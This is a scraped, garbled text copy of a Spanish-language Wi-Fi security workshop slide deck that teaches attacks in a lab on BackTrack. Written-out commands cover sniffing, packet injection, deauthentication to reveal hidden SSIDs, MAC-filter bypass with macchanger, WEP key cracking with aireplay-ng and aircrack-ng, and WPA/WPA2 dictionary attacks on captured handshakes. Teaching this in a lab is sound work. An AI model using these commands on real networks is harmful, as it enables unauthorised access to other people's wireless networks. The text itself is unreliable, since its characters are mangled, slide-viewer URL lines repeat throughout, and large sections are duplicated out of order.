WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
